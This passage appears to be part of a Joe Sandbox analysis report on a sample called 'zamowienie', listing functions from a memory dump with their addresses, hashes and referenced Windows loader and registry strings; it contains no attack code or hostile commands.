                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                              • Opcode ID: 147fd79a2b6e347906e16ebbd07cb042369bd80e79318f4d24bc68834ce6fa6e
                                                                                                                                              • Instruction ID: 03fe178316d36a8a0967401d22a4980e9b235aeb329eec819e7b04d464ae8c3f
                                                                                                                                              • Opcode Fuzzy Hash: 147fd79a2b6e347906e16ebbd07cb042369bd80e79318f4d24bc68834ce6fa6e
                                                                                                                                              • Instruction Fuzzy Hash: 0931F576A10200AFF7109B99CA44F6A7BB8EB40355F0C0919E500BB190D770EE838B98
                                                                                                                                              Function 34F31270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 34F312A5
                                                                                                                                              • BuildLabEx, xrefs: 34F3130F
                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 34F3127B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction ID: d9fd8be4a13b981a916a1932fe7d04fb9b43ecaa620437042ca8d933127b6b27
                                                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction Fuzzy Hash: 1E31B372901619EFEB11DF95CD40EEEBBBDEB84754F084825E514A71A0DB34DA068BA0
                                                                                                                                              Function 34EE74B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: RtlValidateHeap
                                                                                                                                              • API String ID: 3446177414-1797218451
                                                                                                                                              • Opcode ID: 02a54c2eb20232b5cc964275dadce0073ccc33645cb5ebba46bb1bc06af4d8f1
                                                                                                                                              • Instruction ID: e2f665e299e13be0e755a76fd79e96ebd36500d516f4b65f68b56a640ef8a38a
                                                                                                                                              • Opcode Fuzzy Hash: 02a54c2eb20232b5cc964275dadce0073ccc33645cb5ebba46bb1bc06af4d8f1
                                                                                                                                              • Instruction Fuzzy Hash: 4141D276E01346DFEB01CFA4C4907ADBBB2FF41250F088A59D8615B380CB349A46EB90
                                                                                                                                              Function 34F9705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: kLsE
                                                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                                                              • Opcode ID: 9cbed10cad610ecdb830cdda829c89f69a9105f66d5e5a306eb9b04397491973
                                                                                                                                              • Instruction ID: 8f1428bf0e32c37c6255d2467907283577aa9a87425d45adcbf5044a68321145
                                                                                                                                              • Opcode Fuzzy Hash: 9cbed10cad610ecdb830cdda829c89f69a9105f66d5e5a306eb9b04397491973
                                                                                                                                              • Instruction Fuzzy Hash: 4C414771531348DBF7219B60E884BA93BD0EB40769F9C092DED90AA0E1C77554C3CBE9
                                                                                                                                              Function 34F052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@
                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                              • Opcode ID: c20a160fb811fc085a8a3aa33edd12e892d90e8a13739ac8cb9ce11d9d94f9e4
                                                                                                                                              • Instruction ID: 5a4c16d698d8390309d1f517fc62de5d6fd64202713a52661e7b60c97286a67f
                                                                                                                                              • Opcode Fuzzy Hash: c20a160fb811fc085a8a3aa33edd12e892d90e8a13739ac8cb9ce11d9d94f9e4
                                                                                                                                              • Instruction Fuzzy Hash: DB329CB96083118BE764CF14C49073EB7E5AFC4784F589D1EE8958B2A0E7B4C846EF52
                                                                                                                                              Function 34EF5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 2888ad686ac1ecceba85e078071501d09d0207877ba2d6cdc97317a1b8222d1f
                                                                                                                                              • Instruction ID: 43eb95224481b9b4be4a5aa1a3c6c4ad578b1fb61a20f06feabedfc99d9157dc
                                                                                                                                              • Opcode Fuzzy Hash: 2888ad686ac1ecceba85e078071501d09d0207877ba2d6cdc97317a1b8222d1f
                                                                                                                                              • Instruction Fuzzy Hash: 3331CE35301B06EFE7818F60CD80E89B7A9FF54354F095465E81087AA1DB71E822DBD0
                                                                                                                                              Function 34F25CC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$TargetPath
                                                                                                                                              • API String ID: 0-4164548946
                                                                                                                                              • Opcode ID: 7961eaa37c24502d2389c4c44ac49ea5128d350a27ffa3c442650a7671685a66
                                                                                                                                              • Instruction ID: 9aa0ddc5f303b8a302fcd74bf7e4caaa8ff346174b65edbc91ab728d04b48413
                                                                                                                                              • Opcode Fuzzy Hash: 7961eaa37c24502d2389c4c44ac49ea5128d350a27ffa3c442650a7671685a66
                                                                                                                                              • Instruction Fuzzy Hash: 4081C17A9083159FE710CF14C884A6BB7A8FF84758F898D2DE9469B210D738DC57CB92
                                                                                                                                              Function 34F7BC10 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                                                                                              • API String ID: 0-4122831824
                                                                                                                                              • Opcode ID: a91993be189c2a3845da8eba1fe99c1507c2ef5546c7af277b3a05bc675f8cea
                                                                                                                                              • Instruction ID: 81968c8330856b1ca2e9c17eaf5a229569e7f7a9b1b8afdaf7346aa4ac94da1c
                                                                                                                                              • Opcode Fuzzy Hash: a91993be189c2a3845da8eba1fe99c1507c2ef5546c7af277b3a05bc675f8cea
                                                                                                                                              • Instruction Fuzzy Hash: 4991A1755147059FD310CF24C880BABBBE4EF897A8F184E1EE595C7290EB38D946CB92
                                                                                                                                              Function 34F85DA0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Log$RXACT
                                                                                                                                              • API String ID: 0-2401810139
                                                                                                                                              • Opcode ID: c84b527c7733d3ba0aa106032a12733184b24f86d29a897a925ebb481de10192
                                                                                                                                              • Instruction ID: 3bed4b12fa01e2385180f733d2b5948bba49c116a5cc3cbe3eef44cfd5e46e7d
                                                                                                                                              • Opcode Fuzzy Hash: c84b527c7733d3ba0aa106032a12733184b24f86d29a897a925ebb481de10192
                                                                                                                                              • Instruction Fuzzy Hash: 56713872109349EFE712CF54C880E6BBBECFB88654F484D2EF5849A260D775DD068B92
                                                                                                                                              Function 34F0F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$$
                                                                                                                                              • API String ID: 3446177414-233714265
                                                                                                                                              • Opcode ID: d4d0a65de3ecc46b213125573e3c4d6c029ce51b5e512923b5c473cd6896c22c
                                                                                                                                              • Instruction ID: ae057f963a5570c8c014b414e9792ed042c3f2a833a724d77829366db52f4b4c
                                                                                                                                              • Opcode Fuzzy Hash: d4d0a65de3ecc46b213125573e3c4d6c029ce51b5e512923b5c473cd6896c22c
                                                                                                                                              • Instruction Fuzzy Hash: 8061AE75A01749DFEB20CFA4C580BA9B7F1FF84708F088869D5146B240CBB4A942EFA0
                                                                                                                                              Function 34F835BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                              • API String ID: 0-118005554
                                                                                                                                              • Opcode ID: 3b48b65422df28e86394df0d3486ec90ee5aa270a7afbada63da7232570e1691
                                                                                                                                              • Instruction ID: a7d982dca431be5bc077f5069ea5f450ebf5d80018151a2a5ee6f09d6a444cf3
                                                                                                                                              • Opcode Fuzzy Hash: 3b48b65422df28e86394df0d3486ec90ee5aa270a7afbada63da7232570e1691
                                                                                                                                              • Instruction Fuzzy Hash: FD31A9762197419FE301CB68D844B1AB7E4EF84750F090D6DF898CB3A0EA36D906CB92
                                                                                                                                              Function 34F2329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .Local\$@
                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                              • Opcode ID: 5bfe5a065c1060f99414fb5e83b9e4c96008768fb7eb731414fde7bc35fd7247
                                                                                                                                              • Instruction ID: 8c4ffcbcb79fe89d31ebebbf0045393b666ca49d0999e05c8cc403b37fe215a7
                                                                                                                                              • Opcode Fuzzy Hash: 5bfe5a065c1060f99414fb5e83b9e4c96008768fb7eb731414fde7bc35fd7247
                                                                                                                                              • Instruction Fuzzy Hash: 693195BA509705DFE311CF28C880A5BBBE8FB84694F484D2EF59483250DB35DE06CB92
                                                                                                                                              Function 34F234B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34F62A95
                                                                                                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 34F62A90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                              • API String ID: 0-2653619699
                                                                                                                                              • Opcode ID: fd53dc3547e546d27693e9d759d3d90bc6252fd541dfd122944cf4e7701476e6
                                                                                                                                              • Instruction ID: 49b836e2969c3aab49c112b7647a5b5044c7d7cf4005443d15dda1ad7c159f23
                                                                                                                                              • Opcode Fuzzy Hash: fd53dc3547e546d27693e9d759d3d90bc6252fd541dfd122944cf4e7701476e6
                                                                                                                                              • Instruction Fuzzy Hash: C31129BAB00214FFF7258A988D41F5B77ADDB84B54F1D846DB904EB280D6B8CD0286A0
                                                                                                                                              Function 34FC31E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 34FC3356
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4062629308-0
                                                                                                                                              • Opcode ID: 100b17904f0a0d030dbb05c216cbeac9e2ce204fd597c6678f1dc2fbb8af72aa
                                                                                                                                              • Instruction ID: 8ce2c13b8dd4b4be696d73388ca7b93d2fe1fbcff6b2f7233cbfdccdf68b35b5
                                                                                                                                              • Opcode Fuzzy Hash: 100b17904f0a0d030dbb05c216cbeac9e2ce204fd597c6678f1dc2fbb8af72aa
                                                                                                                                              • Instruction Fuzzy Hash: 9FC126B590172A8FDB20CF19C884699FBF5FF88354F5889AED54DA7250D734AA82CF40
                                                                                                                                              Function 34EF1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 0d40f5cfb4116035a9ff2a12bc20a3ad3a6545d20f728705a8eabeedec00abc0
                                                                                                                                              • Instruction ID: 81e4a3351300cd82fefa3dddcaddb7069e7dc437acdc8f765b347773a95b54b9
                                                                                                                                              • Opcode Fuzzy Hash: 0d40f5cfb4116035a9ff2a12bc20a3ad3a6545d20f728705a8eabeedec00abc0
                                                                                                                                              • Instruction Fuzzy Hash: 5EB113B56093408FE354CF68C980A6AFBE1BB88304F584D6EF899D7352D731E946CB52
                                                                                                                                              Function 34EF7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 13e2344df7174d81dd9010535ec484fb9908762825d7dadf7d3cf7727585f6d6
                                                                                                                                              • Instruction ID: d6e4ac8bdb4bd517502a1f09ab7b4b38cc11b9f43ebaca3878eb69e1a59e110e
                                                                                                                                              • Opcode Fuzzy Hash: 13e2344df7174d81dd9010535ec484fb9908762825d7dadf7d3cf7727585f6d6
                                                                                                                                              • Instruction Fuzzy Hash: 9EA15B75A08742DFE310DF28C880A1BBBE6BF88744F164D6DE58597350EB31E946CB92
                                                                                                                                              Function 34EF7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83ed961e2e01d5d6a04f087ceb628966c317987679a0df943fc87d62b5b086a0
                                                                                                                                              • Instruction ID: 34ab570528661b9fc70c5e59bc95258429fa9a3a7a215c5ee983fb6e5841c7a4
                                                                                                                                              • Opcode Fuzzy Hash: 83ed961e2e01d5d6a04f087ceb628966c317987679a0df943fc87d62b5b086a0
                                                                                                                                              • Instruction Fuzzy Hash: 57616D75A00646EFEB08CF68C880A9DFBB5BF88244F19856ED419A7350DB31A942DBD0
                                                                                                                                              Function 34F2F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e2a967cc8ac81f16dc92642ce341aa111933d40dfde7a0fd6c2e4400aac8ab6a
                                                                                                                                              • Instruction ID: 6fcdbccbf58a50ec57e97f5cfcdcab363b9037709db63b28a55ec99bf693e738
                                                                                                                                              • Opcode Fuzzy Hash: e2a967cc8ac81f16dc92642ce341aa111933d40dfde7a0fd6c2e4400aac8ab6a
                                                                                                                                              • Instruction Fuzzy Hash: AF4129B8D11288DFDB10CFA9C880AAEBBF4FF48340F54456EE458A7211D7319A46DF64
                                                                                                                                              Function 34EEB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 22a20c7facb2f9c2e4f93e557be5c3101de95eb5081261251593b80c7e8c186f
                                                                                                                                              • Instruction ID: 864b96d8cf8b036d51eb0033ac984429fe82a1102d5213a0b3397c5cfff16fed
                                                                                                                                              • Opcode Fuzzy Hash: 22a20c7facb2f9c2e4f93e557be5c3101de95eb5081261251593b80c7e8c186f
                                                                                                                                              • Instruction Fuzzy Hash: E1314472A02704DFD311CF14C880A6677AAFF84364F548669ED449B291DB31EC86CFE0
                                                                                                                                              Function 34EF57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
